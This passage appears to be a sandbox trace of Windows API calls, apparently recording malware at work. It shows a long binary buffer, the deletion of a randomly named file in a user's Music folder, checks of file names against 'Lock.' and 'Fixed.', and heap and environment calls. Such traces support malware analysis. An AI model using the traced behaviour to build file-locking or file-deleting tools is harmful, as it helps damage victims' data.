ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0207.899] TranslateMessage (lpMsg=0x8cf968) returned 0 [0207.899] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0207.899] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0207.899] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0207.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0207.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.899] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0207.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0207.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0207.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFAB.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FAB.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AB.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0207.900] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0207.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12) returned 0x29f6e80 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0207.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pFAB.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FAB.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AB.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0207.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0207.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0207.902] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0207.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0207.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0207.902] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0207.902] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74df8 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0207.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0207.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0207.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0207.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 